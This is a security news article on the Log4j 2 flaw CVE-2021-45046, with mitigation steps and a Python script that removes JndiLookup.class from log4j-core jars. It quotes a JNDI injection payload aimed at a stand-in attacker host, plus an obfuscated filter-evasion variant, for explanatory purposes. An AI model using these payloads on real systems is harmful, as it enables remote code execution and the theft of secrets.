News broke recently that another vulnerability has been identified in the JNDI lookup implementation of the Log4j 2 library (CVE-2021-45046). It is present despite the fixes added in version 2.15.0 and regardless of whether the "log4j2.formatMsgNoLookups" protection setting is in use.
The problem is especially dangerous for older versions of Log4j 2 that were protected only with the "formatMsgNoLookups" flag, because it bypasses the mitigation for the earlier Log4Shell vulnerability (CVE-2021-44228) and so again allows an attacker to run code on the server.
For users of version 2.15.0, exploitation is limited to creating the conditions for an abnormal termination of the application through exhaustion of available resources (a denial of service).
The vulnerability only affects systems whose logging configuration uses a context lookup such as ${ctx:loginId}, or a Thread Context Map (MDC) pattern such as %X, %mdc or %MDC, to format log output.
Exploitation boils down to getting data that contains JNDI substitutions written to the log while the application uses context lookups or MDC patterns in the rules that define how log output is formatted.
LunaSec researchers noted that for Log4j versions below 2.15.0 this vulnerability can be used as a new vector for a Log4Shell attack, leading to code execution if ThreadContext expressions that include external data are used in the log output, regardless of whether the "formatMsgNoLookups" flag or the "%m{nolookups}" pattern is in place.
The bypass comes down to this: instead of placing the substitution "${jndi:ldap://example.com/a}" directly in the logged message, it is placed in the value of an intermediate variable that the log formatting rules read.
For example, if the context lookup ${ctx:apiversion} is used when writing to the log, the attack can be carried out by supplying "${jndi:ldap://attacker.com/a}" as the value written to that context variable.
In Log4j 2.15.0 the vulnerability can be used for DoS attacks by passing values into the ThreadContext that send the processing of the output pattern into a loop.
To address the problem, updates 2.16.0 and 2.12.2 (the latter for Java 7) have been released. In the Log4j 2.16 branch, in addition to the fixes introduced in 2.15.0 and the restriction of JNDI LDAP requests to "localhost", JNDI functionality is completely disabled by default and support for message lookup substitution has been removed.
As a workaround, it is suggested to remove the JndiLookup class from the classpath (for example, "zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class"). The application has to be restarted afterwards, and the class has to be removed from every copy of log4j-core, including copies packed inside WAR, EAR or fat jars.
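The zip one-liner above covers a single jar. The following script, added here as an illustration and not an Apache tool, walks a directory tree, applies the same removal to every log4j-core jar it finds, reads the version from the pom.properties file that log4j-core ships, and verifies afterwards that the class is gone. It only handles plain jars on disk; a log4j-core nested inside a WAR, EAR or fat jar must be unpacked first. The `make_sample_jar` helper builds a constructed stand-in jar with fake entries so the script can be exercised offline.

```python
"""Remove JndiLookup.class from every log4j-core jar under a directory and
verify the removal. Added illustration, not an Apache tool. Plain jars only:
a log4j-core nested in a WAR/EAR/fat jar must be unpacked first (assumption)."""
import os
import shutil
import tempfile
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"


def log4j_version(jar):
    """Version string from the Maven pom.properties inside log4j-core, or None."""
    with zipfile.ZipFile(jar) as zf:
        if POM_PROPS not in zf.namelist():
            return None
        for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                return line.split("=", 1)[1].strip()
    return None


def has_jndi_lookup(jar):
    """True while the vulnerable lookup class is still present in the jar."""
    with zipfile.ZipFile(jar) as zf:
        return JNDI_CLASS in zf.namelist()


def strip_jndi_lookup(jar):
    """Rewrite the jar without JndiLookup.class (a zip entry cannot be deleted
    in place) and swap it in atomically. Returns (version, removed)."""
    version = log4j_version(jar)
    if not has_jndi_lookup(jar):
        return version, False
    fd, tmp = tempfile.mkstemp(suffix=".jar", dir=os.path.dirname(os.path.abspath(jar)))
    os.close(fd)
    with zipfile.ZipFile(jar) as src, zipfile.ZipFile(tmp, "w") as dst:
        for info in src.infolist():
            if info.filename != JNDI_CLASS:
                dst.writestr(info, src.read(info.filename))  # keeps per-entry compression
    shutil.copymode(jar, tmp)
    os.replace(tmp, jar)  # back the original up first when doing this in production
    if has_jndi_lookup(jar):
        raise RuntimeError(f"{jar}: JndiLookup.class still present after rewrite")
    return version, True


def scan(root):
    """Yield (path, version, removed) for every log4j-core*.jar under root."""
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            if name.startswith("log4j-core") and name.endswith(".jar"):
                path = os.path.join(dirpath, name)
                version, removed = strip_jndi_lookup(path)
                yield path, version, removed


def make_sample_jar(directory=None, version="2.14.1"):
    """Constructed stand-in for a real log4j-core jar: fake class bytes, real entry names."""
    directory = directory or tempfile.mkdtemp()
    path = os.path.join(directory, f"log4j-core-{version}.jar")
    with zipfile.ZipFile(path, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(POM_PROPS, f"groupId=org.apache.logging.log4j\n"
                               f"artifactId=log4j-core\nversion={version}\n")
        zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # fake class file, constructed
        zf.writestr("org/apache/logging/log4j/core/Logger.class", b"\xca\xfe\xba\xbe")
    return path


if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else os.path.dirname(make_sample_jar())
    for path, version, removed in scan(root):
        state = "JndiLookup removed" if removed else "JndiLookup already absent"
        print(f"{path}: log4j-core {version or '?'}: {state}")
```

Run it as `python3 strip_jndi.py /opt/app` (the file name is my choice); without an argument it builds the constructed sample jar in a temporary directory and cleans that instead. Running it a second time reports every jar as already clean, which is the check to repeat after each deployment.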
As for the actions taken by different projects:
For Nginx, a script based on the njs module has been prepared that blocks the transmission of JNDI expressions in HTTP headers, the URI and the body of POST requests. The script can be used on frontend servers to protect backends.
For HAProxy, configuration rules are provided to block exploitation of CVE-2021-44228.
In addition to the previously observed attacks aimed at building a botnet for cryptocurrency mining, exploitation of the Log4j 2 vulnerability has now been seen spreading ransomware that encrypts the contents of disks and demands a ransom for decryption.
Check Point has identified around 60 different variants of the exploits used in attacks.
Cloudflare reported that attempts to probe for the Log4j vulnerability were identified on December 1, that is, 8 days before the public disclosure of the problem. The first exploitation attempts were recorded only 9 minutes after the information was disclosed. The Cloudflare report also mentions the use of obfuscated substitutions such as "${env:FOO:-j}ndi:${lower:L}da${lower:P}" to evade filters that match the string "jndi:ldap", the use of ${env} expressions in attack payloads to send passwords and access keys stored in environment variables to an external server, and the use of ${sys} expressions to collect information about the system.
Finally, if you are interested in learning more about it, you can check the following link.